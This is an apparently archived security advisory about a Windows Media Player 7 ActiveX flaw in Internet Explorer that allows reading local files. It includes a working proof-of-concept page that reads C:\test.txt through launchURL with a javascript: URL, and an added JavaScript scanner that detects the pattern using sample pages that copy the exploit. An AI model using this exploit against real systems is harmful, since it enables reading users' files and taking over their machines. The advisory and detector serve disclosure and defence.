COMMAND

    media

SYSTEMS AFFECTED

    Windows Media Player 7 and IE

PROBLEM

    The following is based on Georgi Guninski security advisory #31.
    There is a security vulnerability in Windows Media Player 7,
    exploitable through IE, which allows reading local files, which in
    turn allows executing arbitrary programs.  This may lead to
    taking full control over the user's computer.

    The problem is the WMP ActiveX Control, which allows launching
    javascript: URLs in arbitrary already open frames.  This allows
    taking over the frame's DOM.  Examine the code for more info.

    The code is:

        <object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6">
        <PARAM NAME="defaultFrame" value="georgi">
        </object>
        <SCRIPT>
        alert("This page reads C:\\test.txt");
        window.open("file://c:/test.txt","georgi");
        function f()
        {
        document.o1.object.launchURL("javascript:alert(document.body.innerText)");
        }
        setTimeout("f()",1000);
        </SCRIPT>

    Demonstration is available at:

        http://www.guninski.com/wmp7ie.html

SOLUTION

    Disable Active Scripting.
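
    For sites that need to find affected pages in cached or archived
    content, the following is an added example (not part of the original
    advisory) of a static check for the pattern above: the WMP 7 classid,
    a defaultFrame parameter and a literal launchURL call with a
    javascript: URL.  The function names, verdict labels and sample pages
    are assumptions made for illustration.

```javascript
// Added example: static check for the page pattern described in this advisory.
// Function names and sample pages are constructed; only the classid, the
// defaultFrame parameter and launchURL come from the advisory itself.
const WMP7_CLSID = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

// Read one attribute value (double-quoted, single-quoted or bare) from a tag.
function attr(tag, name) {
  const m = new RegExp("\\b" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i").exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function scanPage(html) {
  const result = { controlIds: [], defaultFrames: [], scriptLaunch: false, verdict: "clean" };
  const objectRe = /<object\b[^>]*>[\s\S]*?<\/object>/gi;
  for (const [block] of html.matchAll(objectRe)) {
    const openTag = block.slice(0, block.indexOf(">") + 1);
    const classid = (attr(openTag, "classid") || "").toLowerCase();
    if (classid !== "clsid:" + WMP7_CLSID.toLowerCase()) continue; // other controls
    result.controlIds.push(attr(openTag, "id"));
    for (const [param] of block.matchAll(/<param\b[^>]*>/gi)) {
      if ((attr(param, "name") || "").toLowerCase() === "defaultframe") {
        result.defaultFrames.push(attr(param, "value")); // frame the control targets
      }
    }
  }
  // Only a literal launchURL("javascript:...") is seen; built-up strings are missed.
  result.scriptLaunch = /\.launchURL\s*\(\s*["']\s*javascript:/i.test(html);
  if (result.controlIds.length > 0) {
    if (result.scriptLaunch) result.verdict = "match";
    else if (result.defaultFrames.length > 0) result.verdict = "review";
  }
  return result;
}

// Constructed samples: the first is a shortened form of the advisory's page.
const SAMPLE_ADVISORY = `<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6">
<PARAM NAME="defaultFrame" value="georgi">
</object>
<SCRIPT>
document.o1.object.launchURL("javascript:alert(document.body.innerText)");
</SCRIPT>`;
const SAMPLE_EMBED = `<object id="player" classid="CLSID:6bf52a52-394a-11d3-b153-00c04f79faa6"></object>`;
const SAMPLE_FRAME_ONLY = `<OBJECT classid='clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6'><param value=main name=defaultFrame></OBJECT>`;

console.log(scanPage(SAMPLE_ADVISORY).verdict, scanPage(SAMPLE_EMBED).verdict, scanPage(SAMPLE_FRAME_ONLY).verdict);
```

    A "review" verdict means the control is pointed at a named frame but
    no literal call was found, so the script needs a manual look.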